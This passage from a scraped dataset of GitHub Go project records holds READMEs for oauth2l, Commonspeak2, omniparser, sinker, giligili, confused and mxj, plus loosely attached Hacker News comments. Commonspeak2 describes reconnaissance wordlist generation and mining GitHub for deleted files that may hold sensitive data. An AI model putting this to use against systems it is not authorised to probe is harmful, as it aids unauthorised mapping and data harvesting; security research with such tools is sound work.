--impersonate-service-account\n\nIf specified, exchanges the fetched User access token with a Service Account access token using Google's\nIAM Service. The Service Account parameter can be specified as an ID or an email. Note that at least\none of \"cloud-platform\" or \"iam\" must be included in the scope parameter. Learn more about Service Account\nImpersonation [here](https://cloud.google.com/iam/docs/impersonating-service-accounts).\n\n```bash\n$ oauth2l fetch --credentials ~/client_credentials.json --scope cloud-platform,pubsub --impersonate-service-account 113258942105700140798\n```\n\n### --disableAutoOpenConsentPage\n\nDisables the feature to automatically open the consent page in 3LO loopback flows.\nWhen this option is used, the user will be provided with a URL to manually interact with the consent page.\nThis flag does not take any arguments. Simply add the option to disable this feature.\n\n```bash\n$ oauth2l fetch --credentials ~/client_credentials.json --disableAutoOpenConsentPage --consentPageInteractionTimeout 60 --consentPageInteractionTimeoutUnits seconds --scope cloud-platform\n```\n\n### --consentPageInteractionTimeout\n\nAmount of time to wait for a user to interact with the consent page in 3LO loopback flows.\nOnce the time has lapsed, the localhost at the `redirect_uri` will no longer be available. \nIts default value is 2. See `--consentPageInteractionTimeoutUnits` to change the units.\n\n### --consentPageInteractionTimeoutUnits\n\nUnits of measurement to use when `--consentPageInteractionTimeout` is set.\nIts default value is `minutes`. Valid inputs are `seconds` and `minutes`.\nThis option only affects 3LO loopback flows.\n\n### fetch --output_format\n\nToken's output format for \"fetch\" command. One of bare, header, json, json_compact, pretty, or refresh_token. Default is bare.\n\n```bash\n$ oauth2l fetch --output_format pretty --scope cloud-platform\n```\n\n### curl --url\n\nURL endpoint for curl request. Required for \"curl\" command.\n\n```bash\n$ oauth2l curl --scope cloud-platform --url https://pubsub.googleapis.com/v1/projects/my-project-id/topics\n```\n\n### curl --curlcli\n\nPath to curl CLI. For optional use with \"curl\" command.\n\n```bash\n$ oauth2l curl --curlcli /usr/bin/curl --type sso --email me@google.com --scope cloud-platform --url https://pubsub.googleapis.com/v1/projects/my-project-id/topics\n```\n\n### web --stop\n\nStops the OAuth2l Playground web app.\n\n```bash\n$ oauth2l web --stop\n```\n\n### web --directory\n\nInstalls OAuth2l-web packages to a specfic directory. If this option is used, it should be provided again for future executions of the web command, such as stopping and restarting the web app.\n\n```\n$ oauth2l web --directory your/new/directory\n```\n\n## Previous Version\n\nThe previous version of `oauth2l` was written in Python and it is located\nat the [python](/python) directory. The Python version is deprecated because\nit depends on a legacy auth library and contains some features that are\nno longer best practice. Please switch to use the Go version instead.\n", "readme_type": "markdown", "hn_comments": "Authorizer made it to Alternativeto: https://alternativeto.net/software/authorizer-authentication...Give it a heart, add some supporting comments, and recommend it as an alternativeI received a warning messages from Google a couple of days ago.\nGMail is no longer supporting password-based login or special privileges for third-party apps. If your email client wants to access your GMail account, it must support OAuth2, so that it can use Google's own authentication service. For example, Mozilla Thunderbird works just fine (I tested it); I read that the latest versions of MS Outlook are also fine. \nFor me, this is a high motivation to get rid of my GMail accounts, and move to some real, privacy-friendly email provider.How would you say your service stacks up against something like TailScale (https://tailscale.com/), which seems to solve the same problems but with end-to-end encryption and without the need to setup separate OAuth2 proxies? Where does ShareWith really shine and make things more easy/fast/secure/scalable/better than competitive solutions?This could spare certain engineers so many Slack conversations.Any plans on making something like a Helm chart to deploy to Kubernetes easily?Very cool! Excited to give this a try and see what else you guys come out with. - Louis.Super cool. I've been waiting for someone to pick up Zanzibar since the paper came out!What are your plans for surfacing the policy relations to developers?Is this similar to Cloudflare Access but with a better developer experience?Congrats for launching!\nYou should really simplify the process, because right now after reading your quickstart it seems more complicated to use this compared to implementing a basic auth system inside the appThis is cool. Was trying to deploy something with just private / internal access recently. It'd be cool if the steps could be simplified. Seems like currently I'd need to configure Oauth2proxy. How can I go from a locally running server with no auth protection to deploy in as few steps as possible? Right now I'd need to add an Oauth2proxy layer. I'm sure I could do it in a few hours... can it be entirely eliminated?This looks great!How is revocation handled? Will a proxy using sharewith as an oidc provider hit the authz graph on every request?Looks great! Well done jake, joey, jimmySince you mentioned Google docs style sharing, does Sharewith support abilities for different users eg viewer vs commenter vs editor?How does this compare to AWS Cognito?Nice, this is like an open-source Firebase Authentication. I was wondering whether such a solution existed because, even as Firebase Auth is free for unlimited users, it still is a hosted service whose terms could change at any time.This is wonderful.If a passwordless option was available too, i.e. email a TOTP code that is a nonce, and presentation of the TOTP would generate a JWT with the email address as the claim... then this would become my new login manager.I'm presently using auth0 free plan. Which is nice, but passwordless lock (their JS library) is old, and their docs are not great as to how to update to their other lock library (I've concluded you can't stay passwordless with the main auth0 lock library).I'm a bit surprised the project is called loginsrv, yet the example buttons say \"Sign in with X\" instead of \"Log in with X\". I thought the UX world had more or less consolidated around 'Log in' and 'Sign up', to make the two options as visually distinct at a glance as possible.How do Oauth2 providers like Google and Github handle password resets or stale data with JWT tokens? Curious because I was trying to implement JWT for auth, but might switch to sessions now.Awesome! Are there any other open source microservices fulfilling similar purposes? I've been looking all over the place. I decided to go with keycloak and keycloak-gatekeeper after failing to find anything less heavy weight.This looks brilliant. I could see loginsrv as a drop-in replacement for SaaS product offering the same functionality, like Xsolla.Looks cool. FYI, the \"sign in with google\" button breaks the google branding guidelines [0]. You must use the colored G logo and it must be on a white background.[0] https://developers.google.com/identity/branding-guidelinesI was looking through the examples, it seems like there isn't a way to use this out-of-the-box with an API service that does \"/login\" and \"/signup\" by password hash and compare:- Htpasswd (Dedicated credentials file)- Simple (user/password pairs by configuration)- Httpupstream (HTTP API Basic auth configuration)It mentions \"OSIAM\" which I'm not familiar with.Is there a way to use this to \"enhance\" a basic JWT auth server implementation that does a bcrypt/Argon2 hash or hash comparison on password with these social-sign-on OAuth providers?Or any similar library, that would be really useful.Mmmm, it\u2019s uses JWT. That went out the window, for me.My checklist:\nhttps://egbert.net/blog/articles/authentication-for-api.htmlwould always recommend the standard id_token form for any authentication JWTs https://openid.net/specs/openid-connect-core-1_0.html#IDToke...Will it support LDAP in the near future?yea would be awesome if you could put it in a cloudflare workerOnce you embrace censorship your legitamacy is gone.Two words: lock-in.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "assetnote/commonspeak2", "link": "https://github.com/assetnote/commonspeak2", "tags": [], "stars": 543, "description": "Leverages publicly available datasets from Google BigQuery to generate content discovery and subdomain wordlists", "lang": "Go", "repo_lang": "", "readme": "Commonspeak2\n---\n\nCommonspeak2 leverages publicly available datasets from Google BigQuery to generate content discovery and subdomain wordlists.\n\nAs these datasets are updated on a regular basis, the wordlists generated via Commonspeak2 reflect the current technologies used on the web.\n\nBy using the Golang client for BigQuery, we can stream the data and process it very quickly. The future of this project will revolve around improving the quality of wordlists generated by creating automated filters and substitution functions.\n\nLet's turn creating wordlists from a manual task, into a reproducible and reliable science with BigQuery.\n\n\nI just want the wordlists...\n----\nWe will update [wordlists.assetnote.io](https://wordlists.assetnote.io) website with any wordlists generated the Commonspeak2 tool.\n\nWordlists are automatically generated at the end of each month and uploaded to this site. Further details here: https://github.com/assetnote/wordlists\n\n\nInstructions & Usage\n----\n\nIf you're compiling or running Commonspeak2 from source:\n\n* [Golang 1.10 or above](https://storage.googleapis.com/golang/getgo/installer_linux)\n* [Glide](https://github.com/Masterminds/glide)\n* [Google Cloud Service Account with access to BigQuery](https://cloud.google.com/bigquery/docs/reference/libraries#client-libraries-install-go)\n\nIf you're using the pre-built binaries:\n\n* Download the newest release [here](https://github.com/assetnote/commonspeak2/releases)\n\nUpon completing the above steps, Commonspeak2 can be used in the following ways:\n\n### Subdomains\n\nCurrently subdomains are extracted from HackerNews and HTTPArchive's latest scans. Unlike the previous revision of Commonspeak, the datasets and queries have been optimised to contain valid data that occurs often in the wild. \n\n`\u27e9 ./commonspeak2 --project crunchbox-160315 --credentials credentials.json subdomains -o subdomains.txt`\n\n```\nINFO[0000] Generated SQL template for HackerNews. Mode=Subdomains\nINFO[0000] Generated SQL template for HTTPArchive. Mode=Subdomains\nINFO[0000] Executing BigQuery SQL... this could take some time. Mode=Subdomains Source=hackernews\nINFO[0019] Total rows extracted 71415. Mode=Subdomains Silent=false Source=hackernews Verbose=false\nINFO[0019] Executing BigQuery SQL... this could take some time. Mode=Subdomains Source=httparchive\nINFO[0075] Total rows extracted 484701. Mode=Subdomains Silent=false Source=httparchive Verbose=false\n```\n\n### Words with extensions\n\nUsing a single query on GitHub's dataset, we can extract every path filtered by file extension. This can be done with:\n\n`\u27e9 ./commonspeak2 --project crunchbox-160315 --credentials credentials.json ext-wordlist -e jsp -l 100000 -o jsp.txt`\n\n\n```\nINFO[0000] Executing BigQuery SQL... this could take some time. Extensions=jsp Limit=100000 Mode=WordsWithExt Source=Github\nINFO[0013] Total rows extracted 100000. Mode=WordsWithExt Source=Github\n```\n\nAny set of extensions can be passed via the `-e` flag, i.e. `-e aspx,php,html,js`.\n\n### Deleted files\n\n*Contributed by [mhmdiaa](https://twitter.com/mhmdiaa)*\n\nUsing GitHub's commits dataset, we can extract what may be files that developers decided to delete from their public repositories. These files may contain sensitive data. This can be done with:\n\n`\u27e9 ./commonspeak2 --project crunchbox-160315 --credentials credentials.json deleted-files -l 50000 -o deleted.txt`\n\n\n```\nINFO[0000] Executing BigQuery SQL... this could take some time. Limit=50000 Mode=DeletedFiles Source=Github\nINFO[0013] Total rows extracted 50000. Mode=DeletedFiles Source=Github\n```\n\n\n### Features in Active Development\n\nFeel free to send pull requests to complete the features below, add datasets or improve the architecture of this project. Thank you!\n\n**Routes Based Extraction**\n\nWe can create SQL statements that cover routing patterns in almost any web framework. For now we support the following web frameworks to extract path's from:\n\n- Rails [working implementation \u2705]\n- NodeJS [to be implemented \u274e]\n- Tomcat [to be implemented \u274e]\n\nThis data can be extracted using the following command:\n\n`\u27e9 ./commonspeak2 --project crunchbox-160315 --credentials credentials.json routes --frameworks rails -l 100000 -o rails-routes.txt`\n\nWARNING: running the above query will cost you **lots** of money (over $20 per framework). Commonspeak2 will prompt to confirm that this is OK. To skip this prompt use the `--silent` flag.\n\nWhen this is ran on for Rails routes, Commonspeak2 does the following:\n\n1) Pulls Rails routes from `config/routes.rb` using Regex and the latest Github dataset.\n2) Processes the data, converts it into paths and does contexual replacements to make the path valid (i.e. converting `/:id` to `/1234`)\n3) Normalizes the path, finally saving to disk after all the processing is complete.\n\n**Scheduled Wordlist Generation**\n\nPlanned feature to use a cron-like system to allow for wordlist generation from BigQuery to happen continuously.\n\nWhen this command is introduced, we will insert the `--schedule` parameter to any of our pre-existing commands covered in this README like so:\n\n`\u27e9 ./commonspeak2 --project crunchbox-160315 --credentials credentials.json --schedule weekly routes --frameworks nodejs,tomcat -l 100000 -o nodejs-tomcat-routes.txt`\n\nThe above query will run a weekly BigQuery and save the output to `./nodejs-tomcat-routes.txt`.\n\n**Substitutions and Alterations**\n\nGenerate smart substitutions and alterations for the datasets that it makes sense for. For example, converting string values from `/admin/users/:id` to `/admin/users/1234` (contextually aware of the number).\n\nCredits\n----\n\nShubham Shah [@infosec_au](https://twitter.com/infosec_au)\n\nMichael Gianarakis [@mgianarakis](https://twitter.com/mgianarakis)\n\nLicense\n----\n\n```\n Copyright 2018 Assetnote\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n```\n\n[Assetnote Pty. Ltd.](https://assetnote.io/) - Twitter [@assetnote](https://twitter.com/assetnote)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jf-tech/omniparser", "link": "https://github.com/jf-tech/omniparser", "tags": ["transform", "etl", "xml", "json", "csv", "fixed-length", "edi", "x12", "edifact", "parser", "schema", "javascript", "codeless", "golang", "schemas", "delimited", "fixed-width", "streaming", "txt"], "stars": 543, "description": "omniparser: a native Golang ETL streaming parser and transform library for CSV, JSON, XML, EDI, text, etc.", "lang": "Go", "repo_lang": "", "readme": "# omniparser\n![CI](https://github.com/jf-tech/omniparser/workflows/CI/badge.svg)\n[![codecov](https://codecov.io/gh/jf-tech/omniparser/branch/master/graph/badge.svg)](https://codecov.io/gh/jf-tech/omniparser)\n[![Go Report Card](https://goreportcard.com/badge/github.com/jf-tech/omniparser)](https://goreportcard.com/report/github.com/jf-tech/omniparser)\n[![PkgGoDev](https://pkg.go.dev/badge/github.com/jf-tech/omniparser)](https://pkg.go.dev/github.com/jf-tech/omniparser)\n[![Mentioned in Awesome Go](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go)\n\nOmniparser is a native Golang ETL parser that ingests input data of various formats (**CSV, txt, fixed length/width,\nXML, EDI/X12/EDIFACT, JSON**, and custom formats) in streaming fashion and transforms data into desired JSON output\nbased on a schema written in JSON.\n\nMin Golang Version: 1.14\n\n## Licenses and Sponsorship\nOmniparser is publicly available under [MIT License](./LICENSE).\n[Individual and corporate sponsorships](https://github.com/sponsors/jf-tech/) are welcome and gratefully\nappreciated, and will be listed in the [SPONSORS](./sponsors/SPONSORS.md) page.\n[Company-level sponsors](https://github.com/sponsors/jf-tech/) get additional benefits and supports\ngranted in the [COMPANY LICENSE](./sponsors/COMPANY_LICENSE.md).\n\n## Documentation\n\nDocs:\n- [Getting Started](./doc/gettingstarted.md): a tutorial for writing your first omniparser schema.\n- [IDR](./doc/idr.md): in-memory data representation of ingested data for omniparser.\n- [XPath Based Record Filtering and Data Extraction](./doc/xpath.md): xpath queries are essential to omniparser schema\nwriting. Learn the concept and tricks in depth.\n- [All About Transforms](./doc/transforms.md): everything about `transform_declarations`.\n- [Use of `custom_func`, Specially `javascript`](./doc/use_of_custom_funcs.md): An in depth look of how `custom_func`\nis used, specially the all mighty `javascript` (and `javascript_with_context`).\n- [CSV Schema in Depth](./doc/csv2_in_depth.md): everything about schemas for CSV input.\n- [Fixed-Length Schema in Depth](./doc/fixedlength2_in_depth.md): everything about schemas for fixed-length (e.g. TXT)\ninput\n- [JSON/XML Schema in Depth](./doc/json_xml_in_depth.md): everything about schemas for JSON or XML input.\n- [EDI Schema in Depth](./doc/edi_in_depth.md): everything about schemas for EDI input.\n- [Programmability](./doc/programmability.md): Advanced techniques for using omniparser (or some of its components) in\nyour code.\n\nReferences:\n- [Custom Functions](./doc/customfuncs.md): a complete reference of all built-in custom functions.\n\nExamples:\n- [CSV Examples](extensions/omniv21/samples/csv2)\n- [Fixed-Length Examples](extensions/omniv21/samples/fixedlength2)\n- [JSON Examples](extensions/omniv21/samples/json)\n- [XML Examples](extensions/omniv21/samples/xml).\n- [EDI Examples](extensions/omniv21/samples/edi).\n- [Custom File Format](extensions/omniv21/samples/customfileformats/jsonlog)\n- [Custom Funcs](extensions/omniv21/samples/customfuncs)\n\nIn the example folders above you will find pairs of input files and their schema files. Then in the\n`.snapshots` sub directory, you'll find their corresponding output files.\n\n## Online Playground\n\nUse [The Playground](https://omniparser-prod-omniparser-qd0sj4.mo2.mogenius.io/) (may need to wait for a few seconds for instance to wake up)\nfor trying out schemas and inputs, yours or existing samples, to see how ingestion and transform work.\n\n![](./cli/cmd/web/playground-demo.gif)\n\n## Why\n- No good ETL transform/parser library exists in Golang.\n- Even looking into Java and other languages, choices aren't many and all have limitations:\n - [Smooks](https://www.smooks.org/) is dead, plus its EDI parsing/transform is too heavyweight, needing code-gen.\n - [BeanIO](http://beanio.org/) can't deal with EDI input.\n - [Jolt](https://github.com/bazaarvoice/jolt) can't deal with anything other than JSON input.\n - [JSONata](https://jsonata.org/) still only JSON -> JSON transform.\n- Many of the parsers/transforms don't support streaming read, loading entire input into memory - not acceptable in some\nsituations.\n\n## Requirements\n- Golang 1.14 or later.\n\n## Recent Major Feature Additions/Changes\n- 2022/09: v1.0.4 released: added `csv2` file format that supersedes the original `csv` format with support of hierarchical and nested records.\n- 2022/09: v1.0.3 released: added `fixedlength2` file format that supersedes the original `fixed-length` format with support of hierarchical and nested envelopes.\n- 1.0.0 Released!\n- Added `Transform.RawRecord()` for caller of omniparser to access the raw ingested record.\n- Deprecated `custom_parse` in favor of `custom_func` (`custom_parse` is still usable for\nback-compatibility, it is just removed from all public docs and samples).\n- Added `NonValidatingReader` EDI segment reader.\n- Added fixed-length file format support in omniv21 handler.\n- Added EDI file format support in omniv21 handler.\n- Major restructure/refactoring\n - Upgrade omni schema version to `omni.2.1` due a number of incompatible schema changes:\n - `'result_type'` -> `'type'`\n - `'ignore_error_and_return_empty_str` -> `'ignore_error'`\n - `'keep_leading_trailing_space'` -> `'no_trim'`\n - Changed how we handle custom functions: previously we always use strings as in param type as well as result param\n type. Not anymore, all types are supported for custom function in and out params.\n - Changed the way we package custom functions for extensions: previously we collected custom functions from all\n extensions and then passed all of them to the extension that is used; this feels weird, now only the custom\n functions included in a particular extension are used in that extension.\n - Deprecated/removed most of the custom functions in favor of using 'javascript'.\n - A number of package renaming.\n- Added CSV file format support in omniv2 handler.\n- Introduced IDR node cache for allocation recycling.\n- Introduced [IDR](./doc/idr.md) for in-memory data representation.\n- Added trie based high performance `times.SmartParse`.\n- Command line interface (one-off `transform` cmd or long-running http `server` mode).\n- `javascript` engine integration as a custom_func.\n- JSON stream parser.\n- Extensibility:\n - Ability to provide custom functions.\n - Ability to provide custom schema handler.\n - Ability to customize the built-in omniv2 schema handler's parsing code.\n - Ability to provide a new file format support to built-in omniv2 schema handler.\n\n## Footnotes\n- omniparser is a collaboration effort of [jf-tech](https://github.com/jf-tech/),[Simon](https://github.com/liangxibing)\nand [Steven](http://github.com/wangjia007bond).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "plexsystems/sinker", "link": "https://github.com/plexsystems/sinker", "tags": [], "stars": 543, "description": "A tool to sync images from one container registry to another", "lang": "Go", "repo_lang": "", "readme": "# Sinker\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/plexsystems/sinker)](https://goreportcard.com/report/github.com/plexsystems/sinker)\n[![GitHub release](https://img.shields.io/github/release/plexsystems/sinker.svg)](https://github.com/plexsystems/sinker/releases)\n\n![logo](assets/logo.png)\n\n`sinker` syncs container images from one registry to another. This is useful in cases when you rely on images that exist in a public container registry, but need to pull from a private registry.\n\nImages can be sync'd either by using [The image manifest](#the-image-manifest) or via the command line.\n\nSee the [example](https://github.com/plexsystems/sinker/tree/main/example) folder for more details on the produced files.\n\n## Installation\n\n`go install github.com/plexsystems/sinker@latest`\n\nReleases are also provided in the [releases](https://github.com/plexsystems/sinker/releases) tab on GitHub.\n\n## The image manifest\n\n### The target section\n\n```yaml\ntarget:\n host: mycompany.com\n repository: myteam\n```\n\nThe `target` section is where the images will be synced to. The above yaml would sync all images to the `myteam` repository hosted at `mycompany.com` (`mycompany.com/myteam/...`)\n\n### The images section\n\n```yaml\ntarget:\n host: mycompany.com\n repository: myteam\nsources:\n- repository: coreos/prometheus-operator\n host: quay.io\n tag: v0.40.0\n- repository: super/secret\n tag: v0.3.0\n auth:\n username: DOCKER_USER_ENV\n password: DOCKER_PASSWORD_ENV\n- repository: nginx\n digest: sha256:bbda10abb0b7dc57cfaab5d70ae55bd5aedfa3271686bace9818bba84cd22c29\n```\n\n### Optional host defaults to Docker Hub\n\nIn both the `target` and `sources` section, the `host` field is _optional_. When no host is set, the host is assumed to be Docker Hub.\n\n### Auth\n\nAll auth is handled by looking at the clients Docker auth. If the client can perform a `docker push` or `docker pull`, sinker will be able to as well.\n\nOptionally, the `auth` section allows you to set the names of _environment variables_ that will be used for creating basic auth to the registry. This could be useful in pipelines where auth is stored in environment variables.\n\n## Sync behavior\n\nIf the `target` registry supports nested paths, the entire source repository will be pushed to the target. For example, the `prometheus-operator` would be pushed to:\n\n```text\nmycompany.com/myteam/coreos/prometheus-operator:v0.40.0\n```\n\n**Registries that support nested paths:** Azure Container Registry (ACR), Amazon Elastic Container Registry (ECR), Google Container Registry (GCR)\n\nIf the `target` registry does _not_ support nested paths, only the base path of the source will be pushed to the target registry. For example, the `prometheus-operator` would be pushed to:\n\n```text\nmycompany.com/myteam/prometheus-operator:v0.40.0\n```\n\n**Registries that do not support nested paths:** Docker Hub, GitHub Container Registry, Quay.io\n\n## Demo\n\nAn example run of the `sinker pull` command which pulls all images specified in the image manifest.\n\n![demo](assets/sinker-pull-demo.gif)\n\nFor additional help, you can run `sinker help`.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gourouting/giligili", "link": "https://github.com/gourouting/giligili", "tags": [], "stars": 543, "description": "gin+gorm\u5f00\u53d1\u7684\u89c6\u9891\u7f51\u7ad9\u793a\u4f8b", "lang": "Go", "repo_lang": "", "readme": "# Station G: https://www.gourouting.com\n\nWelcome to [Station G](www.gourouting.com), this site is a learning project of [Singo](https://github.com/bydmm/singo) framework.\n\n## project address\n\nhttps://github.com/bydmm/giligili\n\n## Project Purpose\n\nThe project code is not written to actually operate a video station project.\n\nThe main purpose of this project is to facilitate everyone to learn how to use Golang to write a pure back-end project with front-end and back-end separation\n\n## IMPORTANT: HOW TO RUN\n\n#### 1. Learn Go Module to manage dependencies\n\nThis project has been migrated to use Go Module to manage dependencies, which is different from the beginning of the video! So it cannot run according to the method of the video.\n\nPlease refer to this video to understand what is Go Module: https://www.bilibili.com/video/av63052644/\n\nGo Module will let you solve all kinds of dependency problems in the future, so learning and using it is very valuable for you\n\n#### 2. Configure the database\n\nThis project depends on Mysql and Redis, which are used by any website project, so you need to install and start these two services in advance.\n\nIf you are a windows user, you can quickly solve the problem of mysql and redis installation, through: PHPStudy.\n\nThis video teaches you how to use PHPStudy in a few minutes, https://www.bilibili.com/video/av64485001/\n\nIf you are a hardcore user of OSX or linux, it is not a problem for you to start Mysql and Redis \ud83d\ude01\n\n#### 3. Configure environment variables\n\n> Set environment variables, you can refer to the documentation of singo framework: https://singo.gourouting.com/quick-guide/set-env.html\n\nSince each user's computer environment is different, we use environment variables to change some easily changeable properties.\n\nYou need to copy the .env.example file in the root directory of the project, then create a .env file, and then paste the content into it\n\n```ini\nMYSQL_DSN=\"user:password@tcp(ip:port)/dbname?charset=utf8&parseTime=True&loc=Local\" # mysql connection string\nREDIS_ADDR=\"127.0.0.1:6379\" # redis address\nREDIS_PW=\"\" # redis password (you can leave it blank)\nREDIS_DB=\"\" # redis database (you can leave it blank)\nSESSION_SECRET=\"youneedtoset\" # session key, the development environment does not need to be changed\nGIN_MODE=\"debug\" # Service status, development environment does not need to be changed\n# The following are the parameters of OSS object storage\n# Refer to this video to manage uploaded files: https://www.bilibili.com/video/av60189734/\nOSS_END_POINT=\"oss-cn-hongkong.aliyuncs.com\" # OSS endpoint\nOSS_ACCESS_KEY_ID=\"xxx\"\nOSS_ACCESS_KEY_SECRET=\"qqqq\"\nOSS_BUCKET=\"lalalal\"\n\n```\n\n#### Windows CMD system startup command\n\n```bash\nset GOPROXY=https://mirrors.aliyun.com/goproxy/\nset GO111MODULE=on\n\ngo run main.go\n```\n\n#### Windows Powershell system startup command\n\n```bash\n$env:GOPROXY = 'https://mirrors.aliyun.com/goproxy/'\n$env:GO111MODULE = 'on'\n\ngo run main.go\n```\n\n#### linux / OSX system boot\n\n```bash\nexport GOPROXY=https://mirrors.aliyun.com/goproxy/\nexport GO111MODULE=on\n\ngo run main.go\n```\n\n## Video Live Tutorial Series\n\n[Let's write a G station! Golang full-stack programming scene] (https://space.bilibili.com/10/channel/detail?cid=78794)\n\n## Singo framework\n\nUse Singo to develop web services, use the simplest architecture to implement a sufficient framework, and serve a large number of users\n\nhttps://github.com/bydmm/singo\n\n## Magic Interface Documentation\n\nAfter the service starts: http://localhost:3000/swagger/index.html\n\nThe interface document is located in the project swagger directory. Please read the documentation in the directory", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "visma-prodsec/confused", "link": "https://github.com/visma-prodsec/confused", "tags": ["namespaces", "pypi", "javascript", "python", "npm", "php", "confusion-detection", "infosec", "maven", "java"], "stars": 544, "description": "Tool to check for dependency confusion vulnerabilities in multiple package management systems", "lang": "Go", "repo_lang": "", "readme": "# Confused\n\nA tool for checking for lingering free namespaces for private package names referenced in dependency configuration\nfor Python (pypi) `requirements.txt`, JavaScript (npm) `package.json`, PHP (composer) `composer.json` or MVN (maven) `pom.xml`.\n\n## What is this all about?\n\nOn 9th of February 2021, a security researcher Alex Birsan [published an article](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)\nthat touched different resolve order flaws in dependency management tools present in multiple programming language ecosystems.\n\nMicrosoft [released a whitepaper](https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/)\ndescribing ways to mitigate the impact, while the root cause still remains.\n\n## Interpreting the tool output\n\n`confused` simply reads through a dependency definition file of an application and checks the public package repositories\nfor each dependency entry in that file. It will proceed to report all the package names that are not found in the public\nrepositories - a state that implies that a package might be vulnerable to this kind of attack, while this vector has not\nyet been exploited.\n\nThis however doesn't mean that an application isn't already being actively exploited. If you know your software is using\nprivate package repositories, you should ensure that the namespaces for your private packages have been claimed by a\ntrusted party (typically yourself or your company).\n\n### Known false positives\n\nSome packaging ecosystems like npm have a concept called \"scopes\" that can be either private or public. In short it means\na namespace that has an upper level - the scope. The scopes are not inherently visible publicly, which means that `confused`\ncannot reliably detect if it has been claimed. If your application uses scoped package names, you should ensure that a\ntrusted party has claimed the scope name in the public repositories.\n\n## Installation\n\n- [Download](https://github.com/visma-prodsec/confused/releases/latest) a prebuilt binary from [releases page](https://github.com/visma-prodsec/confused/releases/latest), unpack and run!\n\n _or_\n- If you have recent go compiler installed: `go get -u github.com/visma-prodsec/confused` (the same command works for updating)\n\n _or_\n- git clone https://github.com/visma-prodsec/confused ; cd confused ; go get ; go build\n\n## Usage\n```\nUsage:\n confused [-l LANGUAGENAME] depfilename.ext\n\nUsage of confused:\n -l string\n Package repository system. Possible values: \"pip\", \"npm\", \"composer\", \"mvn\", \"rubygems\" (default \"npm\")\n -s string\n Comma-separated list of known-secure namespaces. Supports wildcards\n -v Verbose output\n\n```\n\n## Example\n\n### Python (PyPI)\n```\n./confused -l pip requirements.txt\n\nIssues found, the following packages are not available in public package repositories:\n [!] internal_package1\n\n```\n\n### JavaScript (npm)\n```\n./confused -l npm package.json\n\nIssues found, the following packages are not available in public package repositories:\n [!] internal_package1\n [!] @mycompany/internal_package1\n [!] @mycompany/internal_package2\n\n# Example when @mycompany private scope has been registered in npm, using -s\n./confused -l npm -s '@mycompany/*' package.json\n\nIssues found, the following packages are not available in public package repositories:\n [!] internal_package1\n```\n\n### Maven (mvn)\n```\n./confused -l mvn pom.xml\n\nIssues found, the following packages are not available in public package repositories:\n [!] internal\n [!] internal/package1\n [!] internal/_package2\n\n```\n\n### Ruby (rubygems)\n```\n./confused -l rubygems Gemfile.lock\n\nIssues found, the following packages are not available in public package repositories:\n [!] internal\n [!] internal/package1\n [!] internal/_package2\n \n```", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "clbanning/mxj", "link": "https://github.com/clbanning/mxj", "tags": [], "stars": 543, "description": "Decode / encode XML to/from map[string]interface{} (or JSON); extract values with dot-notation paths and wildcards. Replaces x2j and j2x packages.", "lang": "Go", "repo_lang": "", "readme": "

mxj - to/from maps, XML and JSON

\nDecode/encode XML to/from map[string]interface{} (or JSON) values, and extract/modify values from maps by key or key-path, including wildcards.\n\nmxj supplants the legacy x2j and j2x packages. If you want the old syntax, use mxj/x2j and mxj/j2x packages.\n\n

Installation

\nUsing go.mod:\n
\ngo get github.com/clbanning/mxj/v2@v2.7\t\n
\n\n
\nimport \"github.com/clbanning/mxj/v2\"\n
\n\n... or just vendor the package.\n\n

Related Packages

\n\nhttps://github.com/clbanning/checkxml provides functions for validating XML data.\n\n

Refactor Encoder - 2020.05.01

\nIssue #70 highlighted that encoding large maps does not scale well, since the original logic used string appends operations. Using bytes.Buffer results in linear scaling for very large XML docs. (Metrics based on MacBook Pro i7 w/ 16 GB.)\n\n\tNodes m.XML() time\n\t54809 12.53708ms\n\t109780 32.403183ms\n\t164678 59.826412ms\n\t482598 109.358007ms\n\n

Refactor Decoder - 2015.11.15

\nFor over a year I've wanted to refactor the XML-to-map[string]interface{} decoder to make it more performant. I recently took the time to do that, since we were using github.com/clbanning/mxj in a production system that could be deployed on a Raspberry Pi. Now the decoder is comparable to the stdlib JSON-to-map[string]interface{} decoder in terms of its additional processing overhead relative to decoding to a structure value. As shown by:\n\n\tBenchmarkNewMapXml-4 \t 100000\t 18043 ns/op\n\tBenchmarkNewStructXml-4 \t 100000\t 14892 ns/op\n\tBenchmarkNewMapJson-4 \t 300000\t 4633 ns/op\n\tBenchmarkNewStructJson-4 \t 300000\t 3427 ns/op\n\tBenchmarkNewMapXmlBooks-4 \t 20000\t 82850 ns/op\n\tBenchmarkNewStructXmlBooks-4 \t 20000\t 67822 ns/op\n\tBenchmarkNewMapJsonBooks-4 \t 100000\t 17222 ns/op\n\tBenchmarkNewStructJsonBooks-4\t 100000\t 15309 ns/op\n\n

Notices

